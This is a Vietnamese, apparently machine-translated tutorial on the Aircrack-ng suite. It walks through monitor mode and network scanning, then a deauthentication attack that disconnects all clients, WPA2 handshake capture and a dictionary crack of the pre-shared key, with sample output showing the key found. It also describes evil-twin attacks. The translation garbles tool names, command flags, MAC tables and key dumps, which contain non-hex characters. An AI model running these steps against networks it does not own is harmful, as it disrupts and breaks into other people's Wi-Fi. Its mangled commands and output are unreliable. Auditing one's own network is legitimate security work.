Cách sử dụng Aircrack-ng

How Use Aircrack Ng



Hầu hết thời gian, mọi người không bao giờ nghĩ về mạng mà họ được kết nối. Họ không bao giờ nghĩ rằng mạng đó an toàn đến mức nào và họ có thể mạo hiểm với dữ liệu bí mật của mình hàng ngày như thế nào. Bạn có thể chạy kiểm tra lỗ hổng bảo mật trên mạng Wi-Fi của mình bằng cách sử dụng một công cụ rất mạnh có tên là Aircrack-ng và Wireshark. Wireshark được sử dụng để giám sát hoạt động mạng. Aircrack-ng giống như một công cụ tích cực cho phép bạn hack và cấp quyền truy cập vào các kết nối Không dây. Suy nghĩ như một kẻ xâm nhập luôn là cách an toàn nhất để bảo vệ bạn khỏi bị hack. Bạn có thể nắm được các hành động chính xác mà kẻ xâm nhập sẽ thực hiện để có được quyền truy cập vào hệ thống của bạn bằng cách tìm hiểu về máy bay. Sau đó, bạn có thể tiến hành kiểm tra sự tuân thủ trên hệ thống của riêng mình để đảm bảo rằng nó không không an toàn.

Aircrack-ng là một bộ phần mềm đầy đủ được thiết kế để kiểm tra bảo mật mạng WiFi. Nó không chỉ là một công cụ đơn lẻ mà là một tập hợp các công cụ, mỗi công cụ thực hiện một mục đích cụ thể. Các lĩnh vực bảo mật wifi khác nhau có thể được thực hiện, như giám sát Điểm truy cập, kiểm tra, tấn công mạng, bẻ khóa mạng wifi và kiểm tra nó. Mục tiêu chính của Aircrack là chặn các gói tin và giải mã các hàm băm để phá mật khẩu. Nó hỗ trợ gần như tất cả các giao diện không dây mới. Aircrack-ng là phiên bản cải tiến của bộ công cụ lỗi thời Aircrack, ng nói đến Thế hệ mới . Một số công cụ tuyệt vời hoạt động cùng nhau để thực hiện một nhiệm vụ lớn hơn.







Airmon:

Airmon-ng được bao gồm trong bộ aircrack-ng đặt card giao diện mạng ở chế độ màn hình. Các card mạng thường sẽ chỉ chấp nhận các gói được nhắm mục tiêu cho chúng như được xác định bởi địa chỉ MAC của NIC, nhưng với airmon-ng, tất cả các gói không dây, cho dù có được nhắm mục tiêu cho chúng hay không, cũng sẽ được chấp nhận. Bạn có thể bắt các gói này mà không cần liên kết hoặc xác thực với điểm truy cập. Nó được sử dụng để kiểm tra trạng thái của Điểm truy cập bằng cách đặt giao diện mạng ở chế độ giám sát. Đầu tiên, người ta phải cấu hình các thẻ không dây để bật chế độ màn hình, sau đó giết tất cả các quy trình nền nếu bạn nghĩ rằng bất kỳ quy trình nào đang can thiệp vào nó. Sau khi kết thúc quá trình, có thể bật chế độ màn hình trên giao diện không dây bằng cách chạy lệnh dưới đây:



[email được bảo vệ]: ~ $sudoairmon-ng start wlan0#

Bạn cũng có thể tắt chế độ màn hình bằng cách dừng airmon-ng bất cứ lúc nào bằng cách sử dụng lệnh dưới đây:

[email được bảo vệ]: ~ $sudoairmon-ng stop wlan0#

Airodump:

Airodump-ng được sử dụng để liệt kê tất cả các mạng xung quanh chúng ta và để xem thông tin có giá trị về chúng. Chức năng cơ bản của airodump-ng là đánh hơi các gói, vì vậy về cơ bản nó được lập trình để lấy tất cả các gói xung quanh chúng ta trong khi được đặt ở chế độ giám sát. Chúng tôi sẽ chạy nó trên tất cả các kết nối xung quanh chúng tôi và thu thập dữ liệu như số lượng khách hàng được kết nối với mạng, địa chỉ mac tương ứng của họ, kiểu mã hóa và tên kênh và sau đó bắt đầu nhắm mục tiêu mạng mục tiêu của chúng tôi.

Bằng cách gõ lệnh airodump-ng và đặt tên giao diện mạng làm tham số, chúng ta có thể kích hoạt công cụ này. Nó sẽ liệt kê tất cả các điểm truy cập, số lượng gói dữ liệu, phương pháp mã hóa và xác thực được sử dụng, và tên của mạng (ESSID). Theo quan điểm hack, địa chỉ mac là trường quan trọng nhất.

[email được bảo vệ]: ~ $sudoairodump-ng wlx0mon

Máy bay:

Aircrack được sử dụng để bẻ khóa mật khẩu. Sau khi nắm bắt tất cả các gói bằng cách sử dụng airodump, chúng ta có thể bẻ khóa bằng cách sử dụng máy bay. Nó bẻ khóa các khóa này bằng hai phương pháp PTW và FMS. Phương pháp PTW được thực hiện trong hai giai đoạn. Lúc đầu, chỉ các gói ARP đang được sử dụng, và chỉ sau đó, nếu khóa không bị bẻ khóa sau khi tìm kiếm, nó sẽ sử dụng tất cả các gói đã được bắt khác. Một điểm cộng của phương pháp PTW là không phải tất cả các gói đều được sử dụng để bẻ khóa. Trong cách tiếp cận thứ hai, tức là FMS, chúng tôi sử dụng cả các mô hình thống kê và các thuật toán bạo lực để bẻ khóa. Một phương pháp từ điển cũng có thể được sử dụng.

Aireplay:

Airplay-ng giới thiệu các gói tới mạng không dây để tạo hoặc tăng tốc lưu lượng. Các gói từ hai nguồn khác nhau có thể được bắt bằng aireplay-ng. Đầu tiên là mạng trực tiếp và mạng thứ hai là các gói từ tệp pcap đã tồn tại. Airplay-ng hữu ích trong một cuộc tấn công hủy xác thực nhắm vào điểm truy cập không dây và người dùng. Hơn nữa, bạn có thể thực hiện một số cuộc tấn công như tấn công cà phê pha cà phê với airplay-ng, một công cụ cho phép bạn lấy khóa từ hệ thống của khách hàng. Bạn có thể đạt được điều này bằng cách bắt một gói ARP, sau đó thao tác và gửi nó trở lại hệ thống. Sau đó máy khách sẽ tạo một gói tin mà airodump có thể bắt được và aircrack bẻ khóa từ gói tin đã sửa đổi đó. Một số tùy chọn tấn công khác của airplay-ng bao gồm chopchop, phân đoạn đang phát, v.v.

Căn cứ không quân:

Airbase-ng được sử dụng để biến máy tính của kẻ xâm nhập thành điểm kết nối bị xâm nhập để những người khác liên kết đến. Sử dụng Airbase-ng, bạn có thể tự nhận mình là điểm truy cập hợp pháp và tiến hành các cuộc tấn công trung gian vào các máy tính được kết nối với mạng của bạn. Những kiểu tấn công này được gọi là Evil Twin Attacks. Người dùng cơ bản không thể phân biệt giữa điểm truy cập hợp pháp và điểm truy cập giả mạo. Vì vậy, mối đe dọa song sinh độc ác là một trong những mối đe dọa không dây đe dọa nhất mà chúng ta phải đối mặt ngày nay.

Airolib-ng:

Airolib tăng tốc quá trình hack bằng cách lưu trữ và quản lý danh sách mật khẩu và điểm truy cập. Hệ quản trị cơ sở dữ liệu được sử dụng bởi chương trình này là SQLite3, hầu hết có sẵn trên tất cả các nền tảng. Việc bẻ khóa mật khẩu bao gồm việc tính toán khóa chính từng cặp qua đó khóa tạm thời riêng tư (PTK) được trích xuất. Sử dụng PTK, bạn có thể xác định mã nhận dạng thông điệp khung (MIC) cho một gói tin nhất định và về mặt lý thuyết tìm thấy MIC tương tự với gói tin, vì vậy nếu PTK đúng thì PMK cũng đúng.

Để xem danh sách mật khẩu và mạng truy cập được lưu trữ trong cơ sở dữ liệu, hãy nhập lệnh sau:

[email được bảo vệ]: ~ $sudoairolib-ng testdatabase –stats

Ở đây testdatabase là db mà bạn muốn truy cập hoặc tạo và –stats là thao tác bạn muốn thực hiện trên nó. Bạn có thể thực hiện nhiều thao tác trên các trường cơ sở dữ liệu, như ưu tiên tối đa cho một số SSID hoặc thứ gì đó. Để sử dụng airolib-ng với aircrack-ng, hãy nhập lệnh sau:

[email được bảo vệ]: ~ $sudoaircrack-ng-NStestdatabase wpa2.eapol.cap

Ở đây, chúng tôi đang sử dụng PMK đã được tính toán được lưu trữ trong cơ sở dữ liệu thử nghiệm để tăng tốc quá trình bẻ khóa mật khẩu.

Bẻ khóa WPA / WPA2 bằng Aircrack-ng:

Hãy xem một ví dụ nhỏ về những gì aircrack-ng có thể làm với sự trợ giúp của một số công cụ tuyệt vời của nó. Chúng tôi sẽ bẻ khóa khóa chia sẻ trước của mạng WPA / WPA2 bằng phương pháp từ điển.

Điều đầu tiên chúng ta cần làm là liệt kê các giao diện mạng hỗ trợ chế độ màn hình. Điều này có thể được thực hiện bằng cách sử dụng lệnh sau:

[email được bảo vệ]: ~ $sudoairmon-ng

Bộ chip điều khiển giao diện PHY

Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

Chúng ta có thể thấy một giao diện; bây giờ, chúng ta phải đặt giao diện mạng mà chúng ta đã tìm thấy (wlx0) ở chế độ giám sát bằng cách sử dụng lệnh sau:

[email được bảo vệ]: ~ $sudoairmon-ng start wlx0

Nó đã bật chế độ giám sát trên giao diện được gọi là wlx0mon .

Bây giờ chúng ta nên bắt đầu nghe các chương trình phát sóng của các bộ định tuyến gần đó thông qua giao diện mạng mà chúng ta đã đặt ở chế độ giám sát.

[email được bảo vệ]: ~ $sudoairodump-ng wlx0mon

CH5 ][Đã trôi qua:30NS][ Năm 2020-12-02 00:17



BSSID PWR Beacons#Data, # / s CH MB ENC CIPHER AUTH ESSID



E4: 6F:13: 04: CE:31 -Bốn năm 62 27 0 154e WPA2 CCMP PSK CrackIt

C4: E9:84:76:10:THÌ LÀ Ở-63 77 0 0 654e. WPA2 CCMP PSK Hackme

C8: 3A:35: A0: 4E: 01-63 84 0 0 số 854e WPA2 CCMP PSK Net07

74: CHO:88: FA:38: 02-68 28 2 0 mười một54e WPA2 CCMP PSK TP-Link_3802



Thăm dò tỷ lệ khung hình bị mất của BSSID STATION PWR



E4: 6F:13: 04: CE:315C: 3A:Bốn năm: D7: EA: 8B -3 0- 1esố 8 5

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -331e- 6e0 3

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -35 0-1 0 6

E4: 6F:13: 04: CE:31BC:91: B5: F8: 7E: D5 -390e-1 1002 13

Mạng mục tiêu của chúng tôi là Crackit trong trường hợp này, kênh hiện đang chạy trên kênh 1.

Ở đây, để bẻ khóa mật khẩu của mạng mục tiêu, chúng ta cần nắm bắt một cú bắt tay 4 chiều, xảy ra khi một thiết bị cố gắng kết nối với một mạng. Chúng ta có thể nắm bắt nó bằng cách sử dụng lệnh sau:

[email được bảo vệ]: ~ $sudoairodump-ng-NS 1--bssid E4: 6F:13: 04: CE:31 -trong /nhà wlx0

-NS : Kênh

–Bss : Bssid của mạng mục tiêu

-trong : Tên của thư mục nơi tệp pcap sẽ được đặt

Bây giờ chúng ta phải đợi một thiết bị kết nối mạng, nhưng có một cách tốt hơn để nắm bắt một cái bắt tay. Chúng tôi có thể hủy xác thực các thiết bị với AP bằng cách sử dụng cuộc tấn công hủy xác thực bằng lệnh sau:

[email được bảo vệ]: ~ $sudoaireplay-ng-0 -đếnE4: 6F:13: 04: CE:31

đến : Bssid của mạng mục tiêu

-0 : cuộc tấn công hủy xác thực

Chúng tôi đã ngắt kết nối tất cả các thiết bị và bây giờ chúng tôi phải đợi một thiết bị kết nối mạng.

CH1 ][Đã trôi qua:30NS][ Năm 2020-12-02 00:02][Bắt tay WPA: E4: 6F:13: 04: CE:31



BSSID PWR RXQ Beacons#Data, # / s CH MB ENC CIPHER AUTH E



E4: 6F:13: 04: CE:31 -47 1 228 807 36 1WPA2 CCMP PSK P thứ 54



Thăm dò tỷ lệ khung hình bị mất của BSSID STATION PWR



E4: 6F:13: 04: CE:31BC:91: B5: F8: 7E: D5 -35 0-1 0 1

E4: 6F:13: 04: CE:315C: 3A:Bốn năm: D7: EA: 8B -290e- 1e0 22

E4: 6F:13: 04: CE:31 88:28: B3:30:27: 7E -310e-1 0 32

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -350e- 6e263 708CrackIt

E4: 6F:13: 04: CE:31D4: 6A: 6A:99: ED: E3 -350e- 0e0 86

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -37 0- 1e0 1

Chúng tôi đã đạt được thành công và bằng cách nhìn vào góc trên cùng bên phải ngay bên cạnh thời gian, chúng tôi có thể thấy một cú bắt tay đã được thực hiện. Bây giờ hãy tìm trong thư mục được chỉ định ( /Trang Chủ trong trường hợp của chúng tôi) cho một .pcap tập tin.

Để bẻ khóa WPA, chúng ta có thể sử dụng lệnh sau:

[email được bảo vệ]: ~ $sudoaircrack-ng-a2 -trongRockou.txt-NSE4: 6F:13: 04: CE:31bắt tay.cap

b: Bssid của mạng đích

-a2: Chế độ WPA2

Rockyou.txt: Từ điểntập tinđã sử dụng

Handshake.cap:tập tin cái màchứa cái bắt tay đã chụp

Aircrack-ng1,2beta3

[00:01:49] 10566các phím đã được kiểm tra(1017,96đến/NS)

TÌM HIỂU CHÍNH! [yougotme]

Khóa chính: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B 7B 6D

0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6Fnăm mươiNS


Phím thoáng qua: 4D C4 5R 6T76 996G 7H 8D EC

H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896B

A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089

8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B

MAC: CB 5A F8 CE62B2 1B F7 6Fnăm mươiC025 62E9 5D71

Chìa khóa cho mạng mục tiêu của chúng tôi đã được bẻ khóa thành công.

Phần kết luận:

Mạng không dây có ở khắp mọi nơi, được sử dụng bởi mỗi và mọi công ty, từ công nhân sử dụng điện thoại thông minh đến các thiết bị điều khiển công nghiệp. Theo nghiên cứu, gần 50% lưu lượng truy cập internet sẽ qua WiFi vào năm 2021. Mạng không dây có nhiều ưu điểm, giao tiếp bên ngoài cửa, truy cập internet nhanh chóng ở những nơi gần như không thể đặt dây, có thể mở rộng mạng mà không cần lắp cáp cho bất kỳ người dùng nào khác và có thể dễ dàng kết nối thiết bị di động của bạn với văn phòng tại nhà khi bạn không ở đó.

Bất chấp những ưu điểm này, vẫn còn một dấu hỏi lớn về quyền riêng tư và bảo mật của bạn. Như các mạng này; trong phạm vi truyền của các bộ định tuyến được mở cho tất cả mọi người, chúng có thể dễ dàng bị tấn công và dữ liệu của bạn có thể dễ dàng bị xâm phạm. Ví dụ: nếu bạn được kết nối với một số wifi công cộng, bất kỳ ai kết nối với mạng đó đều có thể dễ dàng kiểm tra lưu lượng mạng của bạn bằng cách sử dụng một số thông minh và với sự trợ giúp của các công cụ tuyệt vời có sẵn và thậm chí là kết xuất nó.